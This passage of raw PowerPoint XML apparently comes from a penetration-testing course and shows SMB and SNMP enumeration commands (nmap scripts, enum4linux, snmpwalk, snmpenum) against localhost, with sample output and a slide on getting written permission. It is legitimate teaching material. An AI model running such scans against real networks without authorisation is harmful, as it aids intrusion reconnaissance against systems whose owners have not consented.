              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> -v -p 139,445 127.0.0.1 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>-discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>PORT    STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>netbios-ssn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>-ds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Host script results:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>-discovery: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|   OS: Windows 6.1 (Samba 4.9.11-Debian)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|   Computer name: kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|   NetBIOS computer name: KALI\x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|   Domain name: \x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|   FQDN: kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|_  System time: 2019-10-19T03:06:40-04:00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3369132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Permission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Make sure you have written permission to pen test the network, web application, mobile application and any related hardware, from the highest organizational personnel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Warn other teams that might not know about your security test, before alarms are set off.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stay within the defined scope, do not test domains, services, hardware, or software that is not in scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52692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654B-7E3C-B24D-AF01-6F5E41D7A4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB Discovery – Enum4linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9E2D9E-C747-554B-9FD2-45C9223B7AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t># enum4linux 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Starting enum4linux v0.8.9 ( http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>labs.portcullis.co.uk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/application/enum4linux/ ) on Sat Oct 19 03:01:59 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> ========================== </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>|    Target Information    |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> ========================== </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Target ........... 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>RID Range ........ 500-550,1000-1050</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Username ......... ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Password ......... ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Known Usernames .. administrator, guest, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>, domain admins, root, bin, none</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215717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FA22-51A2-9446-B465-9982154440D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMP Discovery - Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858B35B9-0360-724D-B5F7-00A1508298E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> --open -p 161 127.0.0.1 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Starting Nmap 7.80 ( https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> ) at 2019-10-19 03:18 EDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Nmap scan report for localhost (127.0.0.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Host is up (0.0037s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>PORT    STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>161/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|   enterprise: net-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>engineIDFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>engineIDData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 197d5c67b6b8aa5d00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>snmpEngineBoots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|_  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>snmpEngineTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 37s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311848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86AD4-14B6-F043-B77A-49507E69F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMP OIDs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D5DF48C-CAD7-B742-AAB2-AB77C51FA61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	RUNNING PROCESSES	1.3.6.1.2.1.25.4.2.1.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	INSTALLED SOFTWARE	1.3.6.1.2.1.25.6.3.1.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	SYSTEM INFO	1.3.6.1.2.1.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	HOSTNAME		1.3.6.1.2.1.1.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	DOMAIN		1.3.6.1.4.1.77.1.4.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	UPTIME		1.3.6.1.2.1.1.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	USERS		1.3.6.1.4.1.77.1.2.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	SHARES		1.3.6.1.4.1.77.1.2.27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	DISKS		1.3.6.1.2.1.25.2.3.1.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	SERVICES		1.3.6.1.4.1.77.1.2.3.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	LISTENING TCP PORTS	1.3.6.1.2.1.6.13.1.3.0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows	LISTENING UDP PORTS	1.3.6.1.2.1.7.5.1.2.0.0.0.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2822754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FA22-51A2-9446-B465-9982154440D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMP Discovery - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SNMPWalk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858B35B9-0360-724D-B5F7-00A1508298E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmpwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c public -v1 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.1.0 = STRING: "Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.3.0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Timeticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: (13528) 0:02:15.28</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.4.0 = STRING: "Me &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>me@example.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.5.0 = STRING: "kali"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.7.0 = INTEGER: 72</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iso.3.6.1.2.1.1.8.0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Timeticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: (1) 0:00:00.01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272030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FA22-51A2-9446-B465-9982154440D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMP Discovery - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SNMPEnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858B35B9-0360-724D-B5F7-00A1508298E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmpenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 127.0.0.1 public /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
